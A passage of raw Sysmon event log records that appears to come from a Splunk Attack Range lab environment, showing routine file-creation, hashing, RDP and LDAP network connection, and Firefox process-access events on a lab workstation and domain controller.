Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0C35D05F7DC1A3D9FC1AB02AF80753A,SHA256=2EDB8EB3EB84C02E10952034E18F6AE1A42C85381699DA4AE986DEA160BD5D8F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978463Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:07.727{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-49928-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978462Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:10.317{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=95823BE70AD3294F5FDFF22C98790582,SHA256=23C75888A6E85A9F371B4008708E7C77B985625F23BB077FA3E042B655725835,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978461Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:10.317{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E545AD808FEA3CE1DE38C1CEEE76FD96,SHA256=543E2B2A5C8AAD5BDDF8BC99CCB7501F9FD227BB15EB40B2C135B88E06D478FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978468Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:11.582{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F392F3BF703566377489A7D6C7CA15B0,SHA256=A1BA5EA3B0B46899E2E9E6D88C04EA22BFFF8F3DF3E2242B3A838904E7D87BD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049842Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:11.344{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9FE01BAFFAF234A47F16B516844CEB60,SHA256=BE291045C0B79A8CD3CBF17E31886074983BD9925DABCBF5AED7563CEB81327A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049841Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:11.344{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=022EE5AD260DE1F9E4174D1524D64EEA,SHA256=5E1AE7B7E46A257522FDB9D995416CC3DEB28344D93386CF41CBB80476FED08C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049840Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:11.125{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBD1B0C26141440F87CAAAFED73D60DF,SHA256=EB8318C438F27D1CFBEF412CF675C0D2B98A3BA9101EC3DAFE4E12FDE4E2DA97,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978467Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:08.134{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59365-false10.0.1.14-49672- 354300x8000000000000000978466Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:07.877{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de65484-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000978465Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:07.772{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59364-false10.0.1.12-8000- 354300x80000000000000001049839Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:09.198{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15-59365-false10.0.1.14win-dc-429.attackrange.local49672- 354300x80000000000000001049838Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:09.113{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-52976-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000978471Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:12.598{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3FCDB3BA1F9BADB58955A1EE6DAD215,SHA256=1965D0756E6770725A748C478AF190E5B6424680889703C87A38CDA55E216CAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049844Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:12.144{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E86E7F905247F933C7DF5562F8716D5,SHA256=DA416DEE04EA0D45F57C8D4002274320DECE777D412BDFD131A90B0F85A73EDF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049843Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:10.662{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-51637-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x8000000000000000978470Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:09.147{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-53732-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978469Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:12.441{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=95823BE70AD3294F5FDFF22C98790582,SHA256=23C75888A6E85A9F371B4008708E7C77B985625F23BB077FA3E042B655725835,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978473Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:13.644{69CF5F33-7F29-614D-1D00-00000000FD01}1960NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978472Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:13.613{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF0129CB463D23B224A0EF9CF3E02F46,SHA256=886A3983C2B13F696626D13C52910F98AE596FBD15140AC610DF23DA8881837E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049846Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:10.866{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53341-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049845Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:13.159{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F2B53F0A09E8FC209E042C53D778D28,SHA256=6D48570115FA4A9A48539E9B5C94FD8F30534CB3926DBD95C84334D8B75AB26D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978474Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:14.629{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97E7B534E383749F9BB3BDA7EF8335F1,SHA256=38FFC3638C5C7A1EE236B91B178A5F8F006258D0D991FD3EC8464EF2103FD8A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049848Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:14.946{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9FE01BAFFAF234A47F16B516844CEB60,SHA256=BE291045C0B79A8CD3CBF17E31886074983BD9925DABCBF5AED7563CEB81327A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049847Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:14.175{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4A39C22BD7B48849369C124596CC3EE,SHA256=B1224E15B9E7CCB8607610DF0994AC59DB15A52DC558476555156FA10AF5AA65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978476Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:15.645{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A77F5EE5ADF11534413A8277AA6F637,SHA256=04B3DF21808BDD588CC275989B4C0918B11FB138BF06521C392575A0438DA819,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049850Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:13.149{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55655-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049849Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:15.177{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28FFD019312D190B64D9BBFCA84A2BD7,SHA256=BA18280BF907EC8BB8153F300D193CA0DAE80FD390707F840D44EB0A5A352C06,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978475Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:12.272{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59366-false10.0.1.12-8089- 23542300x8000000000000000978477Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:16.645{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=519DA479A978611DF5B1291FB4E9E5BC,SHA256=58E87E92EFA9580024959E54D93B1FE9147A9219F015D8E358721124AFFE83AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049851Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:16.308{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E22066D5AC03A815646E7A30A6A4D9D,SHA256=E3CA2A1C19BA8BE0EBC67E694661BA7E8411CDF9528B23473176DEEFE7578C24,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978479Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:13.725{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59367-false10.0.1.12-8000- 23542300x8000000000000000978478Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:17.660{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B921EDC91634CC2E3F25C049817ADC9F,SHA256=B049878D47498137DE8DF5126FD86DFCDA4B49F0A538DF7A8115C067E63C5028,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049854Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:17.478{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049853Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:17.346{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=440E2775987437EDA4F797515C2A3A26,SHA256=03DD5D084CE96CBFE6470234930D0E45551E7FC5D56AC9C3BD5224A03116E150,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049852Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:17.327{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C09E76B705E2BD2CD2F4D70B5C7C6ED3,SHA256=2C93392DAC7DD0ECFE47736C13DC65C46C3E6F216FB1F176E7B52C18D8AE32FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978480Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:18.660{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=923BB2695992FF3AC270CF4CC16FE6AB,SHA256=50BC88CA4CBD6D4A5D9909B37917D6DC6ABBF9CBD1A2CD64528FDDC27D63FF03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049859Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:18.363{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9ED2BFE5951F7C153822DB103A02A7A5,SHA256=9B434000005C489DF3AAD6B68D654506BDD4470F04C8903002D62C4126E90FB5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049858Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:16.719{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53343-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001049857Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:16.038{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53342-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001049856Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:16.037{5EBD8912-7F40-614D-2700-00000000FC01}2888C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53342-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 10341000x80000000000000001049855Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:18.225{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001049865Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:19.810{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\AlternateServices.txt2021-09-27 08:10:19.712 23542300x80000000000000001049864Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:19.810{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\AlternateServices.txtMD5=D9959DF6FB289A850E6A80973BF40E03,SHA256=D26D5DE9E70A213D731450102B3B5BEA4E46C7307542F1E4409AD6CDFC074C4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049863Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:19.394{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D00EDF06DC74168C25EC23EFBDF1AE3,SHA256=4A74B0B4F775A7E1829B391168E3C935EE9D411B7E758FD6DBC3861A5E90D385,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001049862Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:19.394{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\SiteSecurityServiceState.txt2021-09-27 08:10:19.295 23542300x80000000000000001049861Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:19.394{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\SiteSecurityServiceState.txtMD5=F0F5C3B25B5D5B6EAED8FC8B83F4E7A9,SHA256=BEF355FF78E076AA35BCDC7C36FC9C33A60F0D0A28DCD53C04AD2150DDFA66DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978484Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:19.770{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5ACD2B43E16E7BA8684DD4D048787B04,SHA256=772CBDCD5AB38BC2DD6A45AA1C48BE6D21F01B908FDCDF8E66A2BACCD04570CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978483Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:19.770{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=222C5CBC553B865B23BBE79748E2005C,SHA256=2F31C6B3449D57099EAF4650F20D6D8CC2FA3456B88FCDB25BA313F086785E8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978482Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:19.676{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF67BEA0FC9A990DC0964179CC534CCC,SHA256=D6EEC1EED61362399E64C33E9A10D353AB663266507198287EE5351A5FB2CEDB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978481Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:17.052{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-58770-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x80000000000000001049860Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:16.890{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse210.245.92.42-60089-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000978485Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:20.691{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6275AECDC9FD247B375416DB65FBD851,SHA256=5C71AB57DF694212BCE78FFB3015EB3D42F6E59B3469EE5F4A810B5E7DC3FDDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049867Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:20.478{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52E5F3DBD0C44D030ACE9E572D985808,SHA256=A469D0EE1E8A7009CC935E7C8D08E9D212DCBA6019C65E198F6ED1BBE873D37C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049866Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:20.447{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=73A81A80888010A7FF4BB490E4E14288,SHA256=55700A6E1A35E31D18D443E323DAC27CE4C6FD160535ADD6ECA25C561E60345D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978487Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:18.819{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59368-false10.0.1.12-8000- 23542300x8000000000000000978486Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:21.707{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCFC801C12ED632003A55C1AE7C60104,SHA256=E78E3C83219CA2306AD541F6595865B429EA16A020299CBD727F6279C73221AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049868Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 